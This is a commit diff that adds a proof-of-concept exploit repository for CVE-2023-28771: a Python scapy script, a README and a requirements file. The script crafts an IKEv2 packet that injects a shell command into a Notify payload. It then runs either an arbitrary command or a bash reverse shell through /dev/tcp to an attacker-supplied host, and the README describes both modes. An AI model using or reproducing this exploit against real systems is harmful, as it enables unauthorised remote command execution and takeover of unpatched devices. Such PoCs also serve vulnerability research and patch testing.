update

CVE-2023-28771-PoC/CVE-2023-28771-poc.py

@@ -0,0 +1,26 @@
+#!/usr/bin/python3
+import sys
+from scapy.all import *
+import argparse
+
+parser = argparse.ArgumentParser()
+parser.add_argument("rhost")
+parser.add_argument("--cmd")
+parser.add_argument("--lhost")
+parser.add_argument("--lport")
+args = parser.parse_args()
+
+load_contrib('ikev2')
+
+if args.cmd is not None:
+	cmd = "\";bash -c \"" + args.cmd + "\";echo -n \""
+elif args.lhost and args.lport:
+	cmd = "\";bash -c \"exec bash -i &>/dev/tcp/" + args.lhost + "/" + args.lport + " <&1;\";echo -n \""
+else:
+	print("Check your syntax, and try again")
+	sys.exit()
+
+
+packet = IP(dst = args.rhost) / UDP(dport = 500) / IKEv2(init_SPI = RandString(8), next_payload = 'Notify', exch_type = 'IKE_SA_INIT', flags='Initiator') / IKEv2_payload_Notify(next_payload = 'Nonce', type = 14, load = "HAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXBHAXB" + cmd) / IKEv2_payload_Nonce(next_payload = 'None', load = RandString(68))
+
+send(packet)

CVE-2023-28771-PoC/README.md

@@ -0,0 +1,19 @@
+# CVE-2023-28771-PoC
+PoC for CVE-2023-28771 based on Rapid7's excellent writeup
+
+Requires the scapy Python library for sending IKE packets.
+
+```
+usage: CVE-2023-28771-poc.py [-h] [--cmd CMD] [--lhost LHOST] [--lport LPORT] rhost
+
+positional arguments:
+  rhost
+
+options:
+  -h, --help     show this help message and exit
+  --cmd CMD
+  --lhost LHOST
+  --lport LPORT
+```
+
+Either use --cmd to run an arbitrary command, or use --lport and --lhost to spawn a revshell

CVE-2023-28771-PoC/requirements.txt

@@ -0,0 +1 @@
+scapy